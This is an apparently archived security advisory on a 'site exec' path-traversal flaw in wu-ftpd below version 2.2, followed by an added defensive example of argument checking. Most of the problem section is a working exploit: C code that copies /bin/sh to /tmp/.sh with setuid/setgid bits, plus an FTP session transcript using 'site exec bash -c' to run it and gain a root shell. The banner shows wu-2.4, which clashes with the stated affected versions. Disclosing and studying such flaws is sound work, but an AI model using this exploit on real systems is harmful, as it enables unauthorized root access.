COMMAND

    wu-ftpd

SYSTEMS AFFECTED

    Systems running wu-ftpd below v2.2

PROBLEM

    WUarchive's ftpd versions below 2.2 have a vulnerability that lets
    you execute any binary you can see with the 'site exec' command by
    calling it with a relative pathname that begins with "../". Here is
    a sample exploit.

    Compile this program in yer dir: cc -o ftpbug ftpbug.c

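	#include <stdio.h>
	#include <stdlib.h>
	#include <unistd.h>

	int main(void)
	{
	   /* runs with whatever privileges ftpd holds when 'site exec' invokes it */
	   seteuid(0);
	   /* copy the shell and mark the copy setuid/setgid */
	   system("cp /bin/sh /tmp/.sh");
	   system("chmod 6777 /tmp/.sh");
	   return 0;
	}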

    Login to the system via ftp:

	220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
	Name (exploitablesys:root): goodaccount
	331 Password required for goodaccount.
	Password: (password)
	230 User goodaccount logged in.
	Remote system type is UNIX.
	Using binary mode to transfer files.
	ftp> quote "site exec bash -c id"      (see if sys is exploitable)
	200-bash -c id
	200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
	200  (end of 'bash -c id')
	ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
	200-bash -c /yer/home/dir/ftpbug
	200  (end of 'bash -c /yer/home/dir/ftpbug')
	ftp> quit
	221 Goodbye.

    Now you have a suid root shell in /tmp/.sh
    Credit for this exploit goes to StaTiC  (statik@free.org)

SOLUTION

    Get a newer release of wu-ftpd.
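
    For reference, the kind of argument check a 'site exec' handler needs,
    as an added example (not part of the original advisory and not wu-ftpd's
    own code). The directory EXEC_DIR, the allowlist contents and the function
    name site_exec_resolve are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed values for this example, not taken from wu-ftpd. */
#define EXEC_DIR "/bin/ftp-exec"
static const char *const ALLOWED[] = { "ls", "gzip", NULL };

/* Map a SITE EXEC argument to a path inside EXEC_DIR.
 * Returns 0 and fills 'out' on success, -1 if the request is rejected. */
int site_exec_resolve(const char *arg, char *out, size_t outlen)
{
    char name[64];
    size_t n, i;

    if (arg == NULL || out == NULL)
        return -1;
    arg += strspn(arg, " \t");            /* skip leading blanks */
    n = strcspn(arg, " \t");              /* program name is the first token */
    if (n == 0 || n >= sizeof(name))
        return -1;
    memcpy(name, arg, n);
    name[n] = '\0';

    /* Any path separator is refused, so "../" cannot climb out of EXEC_DIR. */
    if (strchr(name, '/') != NULL)
        return -1;

    /* Only listed programs run; a shell that happens to be reachable does not. */
    for (i = 0; ALLOWED[i] != NULL; i++) {
        if (strcmp(name, ALLOWED[i]) == 0) {
            int w = snprintf(out, outlen, "%s/%s", EXEC_DIR, name);
            return (w > 0 && (size_t)w < outlen) ? 0 : -1;
        }
    }
    return -1;
}

int main(void)
{
    /* Constructed sample requests. */
    const char *reqs[] = { "ls -l", "../../bin/sh", "bash -c id" };
    char path[128];
    size_t i;

    for (i = 0; i < sizeof(reqs) / sizeof(reqs[0]); i++)
        printf("%-14s -> %s\n", reqs[i],
               site_exec_resolve(reqs[i], path, sizeof(path)) == 0 ? path : "rejected");
    return 0;
}
```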